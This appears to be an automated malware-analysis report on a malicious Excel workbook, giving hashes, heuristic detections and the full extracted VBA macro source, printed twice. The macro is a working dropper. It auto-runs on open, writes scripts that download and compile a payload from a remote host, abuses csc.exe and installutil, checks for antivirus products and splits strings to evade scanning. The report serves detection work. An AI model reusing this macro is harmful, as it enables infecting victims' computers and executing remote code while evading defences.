Office (OLE) malware analysis — malicious · 16f298f302f89f0e

MALICIOUS

Office (OLE)

190.5 KB Created: 2016-05-11 09:34:37 Authoring application: Microsoft Excel First seen: 2020-12-25

MD5: 2ad872e3cad9a67252c45a87abf9e3fa SHA-1: b3b388fc6a11ad8bb42db136459929404cdb9701 SHA-256: 16f298f302f89f0e55d102498a72c1e854e4c21b6ed3a55a159c8ad082c4bcb0

444 Risk Score

Heuristics 12

VBA macros detected medium 8 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

                    Shell "wsc" + "ript " + appdata + "vb.vbs", vbNormalFocus

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
    oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript.Shell"")"
```

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA

Matched line in script

    oFile.WriteLine "uninstall_cmd = ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil """

Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Matched line in script
```
    Set fso = CreateObject("Scripting.FileSystemObject")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set fso = CreateObject("Scripting.FileSystemObject")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
    appdata = Environ$("APPDATA")
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Fake invoice / payment lure low SE_INVOICE_LURE

Document contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6790 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6790 bytes
SHA-256: `38dec768b516bd87d25e6771f946b393465d9db75b358eb88b90e9c74867b993`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ЭтаКнига" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub Workbook_Open() Main End Sub Sub showall() For Each Sheet In ActiveWorkbook.Sheets Sheet.Visible = xlSheetVisible Next Sheet End Sub Sub hidegood() showall For Each Sheet In ActiveWorkbook.Sheets If (Sheet.Name <> "Compatibility error") Then Sheet.Visible = xlSheetVeryHidden End If Next Sheet Sheets("Compatibility error").Select ActiveSheet.Protect Password:="11111111", DrawingObjects:=True, Contents:=True, Scenarios:= _ False, AllowFormattingCells:=True, AllowFormattingColumns:=True, _ AllowFormattingRows:=True, AllowInsertingColumns:=True, AllowInsertingRows _ :=True, AllowInsertingHyperlinks:=True, AllowDeletingColumns:=True, _ AllowDeletingRows:=True, AllowSorting:=True, AllowFiltering:=True, _ AllowUsingPivotTables:=True End Sub Sub showgood() showall For Each Sheet In ActiveWorkbook.Sheets If (Sheet.Name = "Compatibility error") Then Sheet.Visible = xlSheetVeryHidden End If Next Sheet End Sub Sub dropDL(strPath As String) Dim fso As Object Set fso = CreateObject("Scripting.FileSystemObject") Dim oFile As Object Set oFile = fso.CreateTextFile(strPath) oFile.WriteLine "Sub HTTPDow" + "nload( myURL, myPath )" oFile.WriteLine " Dim i, objFile, obj" + "FSO, objHTTP, strFile, strMsg" oFile.WriteLine " di" + "m bStrm: Set bStrm = create" + "object(""Adod" + "b.Stream"")" oFile.WriteLine " Set objHTTP = CreateO" + "bject( ""WinHttp.WinHttpRequest.5.1"" )" oFile.WriteLine " objHTTP.Open ""GET"", myURL, False" oFile.WriteLine " objHTTP.Send" oFile.WriteLine " with bStrm" oFile.WriteLine " .type = 1" oFile.WriteLine " .open" oFile.WriteLine " .wri" + "te objHTTP.respon" + "seBody" oFile.WriteLine " .sav" + "etofile myPath, 2" oFile.WriteLine " .close" oFile.WriteLine " end with" oFile.WriteLine "End Sub" oFile.WriteLine "" oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript." + "Sh" + "ell"")" oFile.WriteLine "userdir = oShell.ExpandEnvironmentStrings(""%APPDATA%"")" oFile.WriteLine "HTTPDownload ""https://norni" + "ckel.tk/ps.cs?1"", userdir+""\ps.cs""" oFile.WriteLine "HTTPDownload ""https://nornick" + "el.tk/prestage.txt?1"", userdir+""\ps.txt""" oFile.Close Set fso = Nothing Set oFile = Nothing End Sub Sub dropEX(strPath As String) Dim fso As Object Set fso = CreateObject("Scripting.FileSystemObject") Dim oFile As Object Set oFile = fso.CreateTextFile(strPath) oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript.Shell"")" oFile.WriteLine "userdir = oShell.ExpandEnvironmentStrings(""%APPDATA%"")" oFile.WriteLine "cmp_cmd=""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe """ oFile.WriteLine "cmp_cmd=cmp_cmd+ ""/reference:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__" + "31bf3856ad364e35\system.management.automation.dll """ oFile.WriteLine "cmp_cmd=cmp_cmd+ ""/out:%APPDATA%\ps.exe %APPDATA%\ps.cs""" oFile.WriteLine "oShell.Run cmp_cmd,0,false" oFile.WriteLine "WScript.Sleep 2000" oFile.WriteLine "uninstall_cmd = ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil """ oFile.WriteLine "uninstall_cmd =uninstall_cmd +""/logfile= /LogToConsole=false """ oFile.WriteLine "uninstall_cmd =uninstall_cmd +""/ScriptName=%APPDATA%\ps.txt /U %APPDATA%\ps.exe""" oFile.WriteLine "oShell.Run uninstall_cmd,0,false" oFile.Close Set fso = Nothing Set oFile = Nothing End Sub Sub dropVB(strPath As String) Dim fso As Object Set fso = CreateObject("Scripting.FileSystemObject") Dim oFile As Object Set oFile = fso.CreateTextFile(strPath) appdata = Environ$("APPDATA") oFile.WriteLine "executeG" + "lobal CreateObject(""Scripting.FileSystemObject"").openTextFile(""" + appdata + "\1.txt"").readAll()" oFile.WriteLine "executeG" + "lobal CreateObject(""Scripting.FileSystemObject"").openTextFile(""" + appdata + "\2.txt"").readAll()" oFile.Close Set fso = Nothing Set oFile = Nothing End Sub Sub dropWP(strPath As String) Dim fso As Object Set fso = CreateObject("Scripting.FileSystemObject") Dim oFile As Object Set oFile = fso.CreateTextFile(strPath) oFile.WriteLine "<job>" oFile.WriteLine "<script language=""VBS" + "cript"" src=""1.txt""/>" oFile.WriteLine "<script language=""VBScrip" + "t"" src=""2.txt""/>" oFile.WriteLine "</job>" oFile.Close Set fso = Nothing Set oFile = Nothing End Sub Sub Main() Dim dep1, dep2, windir, appdata As String Dim prereq As Boolean prereq = True windir = Environ$("WINDIR") appdata = Environ$("APPDATA") + "\" dep1 = windir + "\Microsoft.NET\F" + "ramework64\v4.0." + "30319\csc.exe" dep2 = windir + "\Microsoft.NE" + "T\Framework64\v4.0.3" + "0319\instal" + "lutil.exe" If (prereq) Then dropDL (appdata + "1.txt") dropEX (appdata + "2.txt") If ((Dir("C:\Program Fil" + "es (x86)\Kas" + "persky Lab", vbDirectory)) <> "") Or ((Dir("C:\Program Files (x86)\360", vbDirectory)) <> "") Or ((Dir("C:\Program Files\Trend Micro", vbDirectory)) <> "") Then dropVB (appdata + "vb.vbs") Shell "wsc" + "ript " + appdata + "vb.vbs", vbNormalFocus Else dropWP (appdata + "wp.wsf") Shell "wsc" + "ript " + appdata + "wp.wsf", vbNormalFocus End If End If showgood End Sub Attribute VB_Name = "Лист1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 38dec768b516bd87d25e6771f946b393465d9db75b358eb88b90e9c74867b993

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
    Main
End Sub

Sub showall()
        For Each Sheet In ActiveWorkbook.Sheets
            Sheet.Visible = xlSheetVisible
        Next Sheet
End Sub
Sub hidegood()
    showall
    For Each Sheet In ActiveWorkbook.Sheets
        If (Sheet.Name <> "Compatibility error") Then
            Sheet.Visible = xlSheetVeryHidden
        End If
    Next Sheet
    Sheets("Compatibility error").Select
    ActiveSheet.Protect Password:="11111111", DrawingObjects:=True, Contents:=True, Scenarios:= _
        False, AllowFormattingCells:=True, AllowFormattingColumns:=True, _
        AllowFormattingRows:=True, AllowInsertingColumns:=True, AllowInsertingRows _
        :=True, AllowInsertingHyperlinks:=True, AllowDeletingColumns:=True, _
        AllowDeletingRows:=True, AllowSorting:=True, AllowFiltering:=True, _
        AllowUsingPivotTables:=True
End Sub

Sub showgood()
    showall
    For Each Sheet In ActiveWorkbook.Sheets
        If (Sheet.Name = "Compatibility error") Then
            Sheet.Visible = xlSheetVeryHidden
        End If
    Next Sheet
End Sub


Sub dropDL(strPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(strPath)
    oFile.WriteLine "Sub HTTPDow" + "nload( myURL, myPath )"
    oFile.WriteLine "    Dim i, objFile, obj" + "FSO, objHTTP, strFile, strMsg"
    oFile.WriteLine "    di" + "m bStrm: Set bStrm = create" + "object(""Adod" + "b.Stream"")"
    oFile.WriteLine "    Set objHTTP = CreateO" + "bject( ""WinHttp.WinHttpRequest.5.1"" )"
    oFile.WriteLine "    objHTTP.Open ""GET"", myURL, False"
    oFile.WriteLine "    objHTTP.Send"
    oFile.WriteLine "    with bStrm"
    oFile.WriteLine "        .type = 1"
    oFile.WriteLine "        .open"
    oFile.WriteLine "        .wri" + "te objHTTP.respon" + "seBody"
    oFile.WriteLine "        .sav" + "etofile myPath, 2"
    oFile.WriteLine "        .close"
    oFile.WriteLine "    end with"
    oFile.WriteLine "End Sub"
    oFile.WriteLine ""
    oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript." + "Sh" + "ell"")"
    oFile.WriteLine "userdir = oShell.ExpandEnvironmentStrings(""%APPDATA%"")"
    oFile.WriteLine "HTTPDownload ""https://norni" + "ckel.tk/ps.cs?1"", userdir+""\ps.cs"""
    oFile.WriteLine "HTTPDownload ""https://nornick" + "el.tk/prestage.txt?1"", userdir+""\ps.txt"""
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing
End Sub
Sub dropEX(strPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(strPath)
    oFile.WriteLine "Set oShell = WScript.CreateObject(""WScript.Shell"")"
    oFile.WriteLine "userdir = oShell.ExpandEnvironmentStrings(""%APPDATA%"")"
    oFile.WriteLine "cmp_cmd=""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe """
    oFile.WriteLine "cmp_cmd=cmp_cmd+ ""/reference:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__" + "31bf3856ad364e35\system.management.automation.dll """
    oFile.WriteLine "cmp_cmd=cmp_cmd+ ""/out:%APPDATA%\ps.exe %APPDATA%\ps.cs"""
    oFile.WriteLine "oShell.Run cmp_cmd,0,false"
    oFile.WriteLine "WScript.Sleep 2000"
    oFile.WriteLine "uninstall_cmd = ""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil """
    oFile.WriteLine "uninstall_cmd =uninstall_cmd +""/logfile= /LogToConsole=false """
    oFile.WriteLine "uninstall_cmd =uninstall_cmd +""/ScriptName=%APPDATA%\ps.txt /U %APPDATA%\ps.exe"""
    oFile.WriteLine "oShell.Run uninstall_cmd,0,false"
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing
End Sub

Sub dropVB(strPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(strPath)
    appdata = Environ$("APPDATA")
    oFile.WriteLine "executeG" + "lobal CreateObject(""Scripting.FileSystemObject"").openTextFile(""" + appdata + "\1.txt"").readAll()"
    oFile.WriteLine "executeG" + "lobal CreateObject(""Scripting.FileSystemObject"").openTextFile(""" + appdata + "\2.txt"").readAll()"
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing
End Sub
Sub dropWP(strPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(strPath)
    oFile.WriteLine "<job>"
    oFile.WriteLine "<script language=""VBS" + "cript"" src=""1.txt""/>"
    oFile.WriteLine "<script language=""VBScrip" + "t"" src=""2.txt""/>"
    oFile.WriteLine "</job>"
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing
End Sub
Sub Main()
        Dim dep1, dep2, windir, appdata As String
        Dim prereq As Boolean
        prereq = True
        windir = Environ$("WINDIR")
        appdata = Environ$("APPDATA") + "\"
        dep1 = windir + "\Microsoft.NET\F" + "ramework64\v4.0." + "30319\csc.exe"
        dep2 = windir + "\Microsoft.NE" + "T\Framework64\v4.0.3" + "0319\instal" + "lutil.exe"
        If (prereq) Then
                dropDL (appdata + "1.txt")
                dropEX (appdata + "2.txt")
                
                If ((Dir("C:\Program Fil" + "es (x86)\Kas" + "persky Lab", vbDirectory)) <> "") Or ((Dir("C:\Program Files (x86)\360", vbDirectory)) <> "") Or ((Dir("C:\Program Files\Trend Micro", vbDirectory)) <> "") Then
                    dropVB (appdata + "vb.vbs")
                    Shell "wsc" + "ript " + appdata + "vb.vbs", vbNormalFocus
                Else
                    dropWP (appdata + "wp.wsf")
                    Shell "wsc" + "ript " + appdata + "wp.wsf", vbNormalFocus
                End If
        End If
    showgood
End Sub


Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.